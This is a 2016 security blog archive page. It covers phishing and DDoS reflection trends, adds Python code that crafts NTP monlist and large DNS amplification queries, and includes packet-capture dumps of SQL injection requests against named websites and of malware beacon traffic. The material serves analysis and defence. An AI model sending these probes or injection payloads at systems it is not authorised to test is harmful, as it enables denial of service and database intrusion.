Monthly Archives: January 2016

Cyber Security Trends in 2016 – Denial of Service and Webshells on the rise

According to several security research firms, 2015 saw a steep decline in the number of reported malware infections, with exploit activity down 84% compared to 2013. The only active exploit kits worth noting were Angler, Neutrino and Rig; besides those three, virtually no other major campaigns were detected in 2015. In previous years such as 2013 there were detections of more than 30 different exploit kits, each owned and operated by its own crimeware group. The number of new malware families and variants also dropped by more than 50%. DDoS attacks, on the other hand, rose by 30%, and SQL injection (SQLi) and cross-site scripting (XSS) attacks each rose around 10% over the previous year.

2016 has continued the trends we saw in 2015, with an even smaller number of exploit campaigns detected. The primary vector crimeware families are now using is spam and spear-phishing e-mail. These messages are not like the ones we saw in years past: the hostile actors have learned to use a spell checker, and the content hits closer to home for most would-be victims. Spammers choose subjects and content that the majority of internet users will want to click. Around Christmas and the holidays, for example, the lures are package tracking ("click here to track your package") and purchase receipts delivered as .doc or .xls attachments, which the average user assumes are completely harmless. In fact, if macros are enabled in Microsoft Word/Excel (they are off by default in current Office versions, so the document itself usually asks the victim to click "Enable Content"), opening the malicious attachment runs the macro, which downloads a malicious executable from the attacker's infrastructure, most likely a legitimate web server hacked through a SQLi or XSS vulnerability. Spammers also focus on PayPal account issues and eBay account problems, and now that tax season is approaching, expect fake IRS and TurboTax e-mails or bank-themed campaigns telling you to download your W4 for taxes.
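A mail-gateway check for the attachment chain just described, as an added example that is not part of the original post: it decides whether an Office attachment carries a VBA project before a user ever sees the "Enable Content" bar. OOXML files (.docm, .xlsm) are zip containers, so the check looks for a vbaProject.bin part or a macroEnabled content type; legacy OLE2 files (.doc, .xls) are handled with a byte-level heuristic (searching for the UTF-16LE storage names `VBA` and `Macros`) rather than a walk of the directory sectors, which is an assumption of this demo and not a substitute for a real OLE parser such as oletools. The sample attachments are constructed in memory by `make_ooxml()`.

```python
import io
import zipfile

OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'        # legacy binary .doc/.xls container (OLE2/CFB)
ZIP_MAGIC = b'PK\x03\x04'                               # OOXML .docx/.docm/.xlsx/.xlsm container
# OLE2 directory entries store stream names in UTF-16LE; these names only exist when a VBA project is present.
OLE_MACRO_MARKERS = ('VBA'.encode('utf-16-le'), 'Macros'.encode('utf-16-le'))


def make_ooxml(parts):
    """Build an in-memory OOXML zip from {part name: bytes}; used here to construct the sample attachments."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


def classify(data):
    """Return 'ooxml-macro', 'ooxml', 'zip', 'ole2-macro', 'ole2' or 'other' for the attachment bytes."""
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = [n.lower() for n in z.namelist()]
                types = z.read('[Content_Types].xml').lower() if '[Content_Types].xml' in z.namelist() else b''
        except zipfile.BadZipFile:
            return 'other'
        # A VBA project is stored as word/xl/ppt/vbaProject.bin and declared with a macroEnabled content type.
        if any(n.endswith('vbaproject.bin') for n in names) or b'macroenabled' in types:
            return 'ooxml-macro'
        return 'ooxml' if any(n.startswith(('word/', 'xl/', 'ppt/')) for n in names) else 'zip'
    if data.startswith(OLE_MAGIC):
        # Heuristic scan of the whole file rather than a walk of the directory sectors (assumption of this demo).
        return 'ole2-macro' if any(marker in data for marker in OLE_MACRO_MARKERS) else 'ole2'
    return 'other'


def should_quarantine(data):
    """Gateway policy: hold any Office attachment that carries a macro project for analyst review."""
    return classify(data) in ('ooxml-macro', 'ole2-macro')


if __name__ == '__main__':
    # Constructed "purchase receipt" lure: a .docm with a VBA project inside.
    receipt = make_ooxml({'[Content_Types].xml': b'<Types><Override ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/></Types>',
                          'word/document.xml': b'<w:document/>', 'word/vbaProject.bin': OLE_MAGIC})
    print(classify(receipt), should_quarantine(receipt))
```

Renaming a .docm to .doc does not help the attacker here, because the decision is made on the container bytes, not the extension; the OLE2 branch is the weak spot and should be replaced with a proper CFB directory walk in production.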

The biggest threat to enterprise security is social engineering. When your organization commissions vulnerability assessments and penetration tests, make sure they include exploiting the willingness of your employees and clients to trust others. Your patch management and configuration management can be top notch, but if the people you employ and do business with are susceptible to social engineering you are still at risk of compromise. Mitigating that risk is not a simple task: human beings are trusting by nature and will click links and follow instructions without consciously processing what they are doing, and some of your employees will never see through a well-built pretext no matter how much training they receive. Put up posters, hold mandatory awareness seminars and meetings, and run periodic phishing simulations so you can measure whether the training actually changes behaviour.

The next threat on the rise is denial of service (DoS), and more specifically distributed reflected denial of service (DrDoS). These attacks are easy to conduct: the attacker no longer has to compromise hosts and servers to build a botnet, but simply takes advantage of services that openly reply to UDP requests from outside your network. The most common services that are susceptible and leveraged by attackers are NTP, SSDP, DNS, SNMP, Chargen and peer-to-peer file-sharing protocols. NTP offers the highest amplification factor, up to roughly 500 to 1. The attacker spoofs the source IP of the target and sends a mode 7 monlist request (an 8-byte payload, a few dozen bytes on the wire) to a vulnerable NTP server; the server answers with the last 600 clients it has talked to, up to 100 datagrams of 440 bytes each, and every one of those datagrams goes to the spoofed target rather than to the attacker. To build the reflector list the attacker only needs to scan the internet for UDP port 123, send the request and log every server that responds. Those servers are put into a list and leveraged in attacks. Any server that still answers monlist should be upgraded (monlist was removed in ntpd 4.2.7p26) or configured with `restrict default noquery` and `disable monitor`.
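The request and reply described above, as an added example that is not code from the original post: it builds the 8-byte mode 7 monlist request, decodes the mode 7 reply header, and computes the reply-bytes to request-bytes ratio. The live `probe()` helper sends real UDP and is only for NTP servers you own or are authorised to test; the offline demonstration uses `build_fake_reply()`, a constructed reply with the six 72-byte entries a real 440-byte monlist datagram carries (the entry contents are zeroed, which is an assumption for the demo).

```python
import socket
import struct

# Mode 7 MON_GETLIST_1 request: byte 0 = R(0) M(0) VN(2) Mode(7) = 0x17, byte 1 = auth/seq 0,
# byte 2 = implementation 3 (IMPL_XNTPD), byte 3 = request code 42 (MON_GETLIST_1), then err/nitems and mbz/size = 0.
MONLIST_REQUEST = bytes([0x17, 0x00, 0x03, 0x2a, 0x00, 0x00, 0x00, 0x00])
MON_ENTRY_SIZE = 72          # size of one monlist entry; six fit in a 440-byte reply datagram
MON_ENTRIES_PER_REPLY = 6


def parse_mode7(datagram):
    """Decode the 8-byte mode 7 header of one reply datagram."""
    if len(datagram) < 8:
        raise ValueError('short mode 7 datagram')
    rm_vn_mode, auth_seq, impl, reqcode, err_nitems, mbz_size = struct.unpack('!BBBBHH', datagram[:8])
    return {
        'response': bool(rm_vn_mode & 0x80),   # R bit: this is a reply, not a request
        'more': bool(rm_vn_mode & 0x40),       # M bit: further datagrams follow
        'version': (rm_vn_mode >> 3) & 0x07,
        'mode': rm_vn_mode & 0x07,
        'sequence': auth_seq & 0x7f,
        'implementation': impl,
        'request_code': reqcode,
        'error': err_nitems >> 12,             # 0 = data returned; a server with noquery usually sends nothing at all
        'nitems': err_nitems & 0x0fff,
        'item_size': mbz_size & 0x0fff,
    }


def is_vulnerable(replies):
    """True if at least one reply is a mode 7 monlist answer that actually carries entries."""
    for r in replies:
        h = parse_mode7(r)
        if h['response'] and h['mode'] == 7 and h['request_code'] == 42 and h['error'] == 0 and h['nitems'] > 0:
            return True
    return False


def amplification(request, replies):
    """Reply payload bytes divided by request payload bytes (IP/UDP headers not counted)."""
    return sum(len(r) for r in replies) / len(request)


def probe(host, port=123, timeout=2.0, max_replies=100):
    """Send one monlist request and collect replies until the M bit clears or the socket times out.
    Point this only at NTP servers you own or are authorised to test."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    replies = []
    try:
        s.sendto(MONLIST_REQUEST, (host, port))
        while len(replies) < max_replies:
            data, _ = s.recvfrom(4096)
            replies.append(data)
            if not parse_mode7(data)['more']:
                break
    except socket.timeout:
        pass
    finally:
        s.close()
    return replies


def build_fake_reply(nitems=MON_ENTRIES_PER_REPLY, more=False, seq=0, err=0):
    """Constructed reply for the offline demo: a real header followed by zeroed 72-byte entries (an assumption)."""
    first = 0x80 | (0x40 if more else 0) | (2 << 3) | 7
    header = struct.pack('!BBBBHH', first, seq, 3, 42, (err << 12) | (nitems & 0x0fff), MON_ENTRY_SIZE)
    return header + bytes(MON_ENTRY_SIZE * nitems)


if __name__ == '__main__':
    # 600 remembered clients = 100 datagrams of 440 bytes in answer to 8 bytes.
    replies = [build_fake_reply(more=(i < 99), seq=i) for i in range(100)]
    print('vulnerable:', is_vulnerable(replies), 'amplification: %.0fx' % amplification(MONLIST_REQUEST, replies))
```

The ratio printed here counts only UDP payload; published figures such as the 500:1 in the text include IP/UDP headers and assume the request padding the attack tools use, so the exact number varies, but the shape is the same: a handful of bytes in, tens of kilobytes out.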

As of February 2016, grepping the logs from an analysis of the 400 most recently reported NTP attacks shows a minimum of 16,740 vulnerable NTP servers in the world. This number is significantly lower than the 54,300 vulnerable NTP servers we counted at the beginning of 2015. Nevertheless, a few thousand vulnerable servers are enough to take down most targets. In 2015 there were 4.9 million hosts vulnerable to SSDP amplification attacks; that number has dropped to 1.6 million. While that number is still staggering and capable of generating attacks of 100 MB/s, the amplification factor for SSDP (roughly 30 to 1) is far lower than for NTP.

DNS amplification, however, is on the rise, up 25% from 2015. The attacker does not need a bug in DNS for this: the protocol runs over UDP, so a small query carrying a spoofed source address produces a much larger response that is delivered to the victim. DNS Flooder is a tool commonly used to launch such attacks. Attackers register domain names with massive TXT records, sized to fill the EDNS0 UDP buffer, so that a query of a few dozen bytes returns a response of several kilobytes to the victim. Open resolvers that answer queries for the root zone (".") are a particular concern, since the full root name-server set and its glue is returned to the victim. Attackers combine these weaknesses (open resolvers, oversized records, ANY queries) to amplify attacks at enormous rates; in 2016 an attack exceeding 500 Gbit/s was observed that leveraged every form of DrDoS protocol weakness. DNS amplification using domain names with huge TXT records is currently the largest risk we face from attackers, and it works like this:

[Figure: dns (diagram of the DNS amplification attack; the image is not reproduced in this text)]

A video depicting the attack process was embedded here.
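To make the size arithmetic above concrete, here is an added example that is not from the original post. It builds a wire-format query with an EDNS0 OPT record advertising a 4096-byte UDP buffer, and a constructed TXT response in the shape an attacker-controlled zone would return, so the amplification ratio can be computed offline. `build_txt_response()`, its record contents and the name `example.test` are invented for the demonstration; `measure()` sends a real query and should only be pointed at resolvers you are authorised to test.

```python
import random
import socket
import struct

QTYPE = {'A': 1, 'NS': 2, 'TXT': 16, 'ANY': 255}
OPT_RR_TYPE = 41


def encode_name(name):
    """DNS label encoding; '.' (the root) encodes as a single zero byte."""
    name = name.strip('.')
    out = b''
    if name:
        for label in name.split('.'):
            out += bytes([len(label)]) + label.encode('ascii')
    return out + b'\x00'


def build_query(name, qtype='ANY', edns_size=4096, txid=None):
    """Wire-format query with RD set; with edns_size > 0 an OPT pseudo-RR is appended
    so the server may answer with up to edns_size bytes over UDP instead of truncating at 512."""
    txid = random.randrange(0x10000) if txid is None else txid
    header = struct.pack('!HHHHHH', txid, 0x0100, 1, 0, 0, 1 if edns_size else 0)
    question = encode_name(name) + struct.pack('!HH', QTYPE[qtype], 1)
    opt = b'\x00' + struct.pack('!HHIH', OPT_RR_TYPE, edns_size, 0, 0) if edns_size else b''
    return header + question + opt


def parse_header(resp):
    """Decode the 12-byte DNS header of a response."""
    txid, flags, qd, an, ns, ar = struct.unpack('!HHHHHH', resp[:12])
    return {'txid': txid, 'rcode': flags & 0x0f, 'ra': bool(flags & 0x0080), 'tc': bool(flags & 0x0200),
            'questions': qd, 'answers': an, 'authority': ns, 'additional': ar}


def amplification(query, response):
    """Response bytes divided by query bytes (UDP payload only)."""
    return len(response) / len(query)


def build_txt_response(query, texts, ttl=300):
    """Constructed answer to `query`: one TXT RR per byte string, each split into the
    255-byte character-strings the record format requires. Demo only, not a resolver."""
    txid, = struct.unpack('!H', query[:2])
    qend = 12
    while query[qend] != 0:                    # skip the question labels
        qend += query[qend] + 1
    qend += 5                                  # terminating zero + qtype + qclass
    question = query[12:qend]
    rrs = b''
    for text in texts:
        rdata = b''.join(bytes([len(text[i:i + 255])]) + text[i:i + 255] for i in range(0, len(text), 255))
        rrs += b'\xc0\x0c' + struct.pack('!HHIH', QTYPE['TXT'], 1, ttl, len(rdata)) + rdata
    return struct.pack('!HHHHHH', txid, 0x8180, 1, len(texts), 0, 0) + question + rrs


def measure(resolver, name, qtype='ANY', timeout=2.0):
    """Send one real query over UDP and return (query bytes, response bytes, header). Authorised targets only."""
    q = build_query(name, qtype)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(q, (resolver, 53))
        r, _ = s.recvfrom(65535)
    finally:
        s.close()
    return len(q), len(r), parse_header(r)


if __name__ == '__main__':
    q = build_query('example.test', 'TXT', txid=0x1234)       # placeholder name for the demo
    r = build_txt_response(q, [b'x' * 1000, b'y' * 1000, b'z' * 1000])
    print(len(q), 'byte query ->', len(r), 'byte response, %.1fx' % amplification(q, r))
```

Three 1000-byte TXT strings turn a 41-byte query into a 3078-byte answer, about 75 to 1, and the attacker chooses the zone contents, so the only limits are the EDNS0 buffer the resolver honours and the 64 KB UDP maximum. On the defending side the same `measure()` call run against your own resolver from an external address tells you whether it is open; close recursion to your own clients, enable response rate limiting, and drop spoofed packets at the edge (BCP 38).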


Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

Download Active Business Directory Remote Blind SQL Injection PCAP : remoteblindsql.pcap

 

 

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
.. v…!E…JZ@.q.cm.j..u….P .f).tJ…P..J….HTTP/1.1 500 Internal Server Error
Date: Thu, 01 Jan 2009 14:36:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 4951
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD; path=/
Cache-control: private

Active Business Directory

 

... > 208.106.128.136.80: Flags [.], ack 2841, win 65535, length 0
2009-01-01 09:37:00.315557 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 438, win 65098, length 0
2009-01-01 09:37:00.960486 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 2841:4261, ack 438, win 65098, length 1420: HTTP

 

Tell a Friend
Make This Your Home Page
Book Mark

 

Page Views Visitors
Today 45 45
Jan 45 45
Total 34,232 32,098

 

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ‘Links.CategoryID=categories.CategoryID and Approved<>0 and Links.CategoryID in ()’.

/demoactivebusinessdirectory/includes/gentable.asp, line 40
2009-01-01 09:37:00.963903 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 5250, win 65535, length 0
.. v.*.!E..(W.@…L.u….j.. ..PJ…f*..P….i..
2009-01-01 09:37:00.984661 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 438:967, ack 5250, win 65535, length 529: HTTP: GET /demoactivebusinessdirectory/style.css HTTP/1.1
.. v.;.!E..9W.@…J.u….j.. ..PJ…f*..P…….GET /demoactivebusinessdirectory/style.css HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/css,*/*;q=0.1
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/default.asp?catid=0+and+1=0
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.748226 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 5250:6670, ack 967, win 64569, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…T.@.q.Y..j..u….P .f*..J…P..9….HTTP/1.1 200 OK
Content-Length: 4545
Content-Type: text/css
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT
2009-01-01 09:37:01.754823 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10079, win 65535, length 0
.. v.*.!E..(W.@…LWu….j.. ..PJ…f*!.P….{..
2009-01-01 09:37:01.767340 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 967:1505, ack 10079, win 65535, length 538: HTTP: GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
.. v.D.!E..BX.@…J.u….j.. ..PJ…f*!.P….E..GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/style.css
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.929693 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 967, win 64569, length 0
.. v.,.!E..(Ww@.q.[..j..u….P .f*!.J…P..9.A….
2009-01-01 09:37:02.523785 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [P.], seq 10079:10452, ack 1505, win 65535, length 373: HTTP: HTTP/1.1 200 OK
.. v…!E…\’@.q.U..j..u….P .f*!.J…P…5H..HTTP/1.1 200 OK
Content-Length: 90
Content-Type: image/gif
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT

GIF89a ………….Hq9~.,…. …..3…&…………..H………..B..=…….
…….n..;
2009-01-01 09:37:02.706130 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10452, win 65162, length 0


Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; st1=1531fbf68f1f62ccb7b88e9ed77ce518; st=1531fbf68f1f62ccb7b88e9ed77ce518; PHPSESSID=c1f052c9ac5e264c7b3e29354a9c25cf; _cbclose=1; _cbclose41266=1; _uid41266=7981BF9C.1; _ctout41266=1; verify=test; testcookie=enabled; visit_time=23

2009-01-01 09:30:20.575264 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], ack 820, win 7371, length 0
.. v.,.!E..(..@.4…….u….P.S…..r/.P…(…..
2009-01-01 09:30:20.593702 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1421:2841, ack 820, win 7371, length 1420: HTTP
.. v…!E…..@.4…….u….P.S…e.r/.P…_…ction MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
function setsmile(what)
{
document.Postcomment.CommentText.value = document.Postcomment.elements.CommentText.value+” “+what;
document.Postcomment.CommentText.focus();
}
function PopupPic(sPicURL) {
window.open( “popup.html?”+sPicURL, “”,
“resizable=1,HEIGHT=200,WIDTH=200”);
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//–>

 

 

 
2009-01-01 09:30:20.595004 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [.], ack 1, win 65535, options [nop,nop,sack 1 {1421:2841}], length 0
.. v.6.!E..4..@…..u……..S.P.r/…………….
2009-01-01 09:30:20.595759 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1:1421, ack 820, win 7371, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…..@.4…….u….P.S…..r/.P…….HTTP/1.1 200 OK
Date: Thu, 01 Jan 2009 13:59:20 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; expires=Thu, 01-Jan-2009 14:59:20 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=TIS-620

214b

Musicza Sticker Extreme edition


Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample : kaixin.pcap

 

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@………w……P…=….p…f………..
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X\..o…w……..P..8……>p.@..y……….
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win 64240, length 0
E..(..@………w……P…>8…P……..c…W
2015-01-02 19:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458: HTTP: POST /tj.asp HTTP/1.1
E…..@………w……P…>8…P…U…POST /tj.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.568bar.com/tj.asp
Accept-Language: zh-cn
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.568bar.com
Cache-Control: no-cache

yz=1314&uz=1&jc=
2015-01-02 19:50:38.059030 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [P.], seq 1:624, ack 459, win 65077, length 623: HTTP: HTTP/1.1 200 OK
E…X.@.o.d.w……..P..8…….P..5….HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASBDBQB=BBDKMCDDPEKECFACGNLLOAFO; path=/
Cache-control: private

dnf.exe|lolclient.exe|crossfire.exe|soul.exe|asktao.mod|wow.exe|wow-64.exe|jfzr.exe|launcher.exe|asura.exe|elementclient.exe|qqhxsj.exe|cstrike-online.exe|game.exe|aion.bin|dungeonstriker.exe|zhengtu2.dat|qqsg.exe|gameplaza.exe|gtsaloon.exe|fifazf.exe|dragonnest.exe|dj2.exe|jx3client.exe|tty3d.exe|xxzshell.exe|qqhxgame.exe|tklobby.exe|<br>http://www.sina.com|http://www.sina.com
2015-01-02 19:50:38.059634 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [R.], seq 459, ack 624, win 0, length 0
E..(..@………w……P….8..bP…y8….3.=)
2015-01-02 19:50:38.393027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [S], seq 1143477102, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….3….w……PD(.n….p….?……….
2015-01-02 19:50:38.578643 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [S.], seq 3474551616, ack 1143477103, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X…0..Fw……..P….s@D(.op.@.Y………..
2015-01-02 19:50:38.579027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [.], ack 1, win 64240, length 0
E..(..@….6….w……PD(.o..sAP…….e….I
2015-01-02 19:50:38.579445 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [P.], seq 1:555, ack 1, win 64240, length 554: HTTP: GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
E..R..@………w……PD(.o..sAP…Fu..GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.92liu.com/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.92liu.com
Cache-Control: no-cache
2015-01-02 19:50:38.846793 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [P.], seq 1:263, ack 555, win 64981, length 262: HTTP: HTTP/1.1 200 OK
E…X.@.0…w……..P….sAD(..P…B…HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCAATQTR=NDGIGFGDAIGABFJBDDJBNDCJ; path=/
Cache-control: private

upData Update OK<br>
2015-01-02 19:50:38.847467 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [R.], seq 555, ack 263, win 0, length 0
E..(..@….4….w……PD(….tGP….U…….I


Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP : zemot.pcap

2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1
E..M..@……….wi..t.P…… .P…….GET /b/shoe/749634 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: raing-gerut.su
Cache-Control: no-cache
2014-08-15 09:11:05.358095 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 294, win 64240, length 0
E..(V……b.wi……P.t.. …..P………….
2014-08-15 09:11:05.694537 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [P.], seq 1:149, ack 294, win 64240, length 148: HTTP: HTTP/1.1 200 OK
E…Y……B.wi……P.t.. …..P…K*..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:11:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close
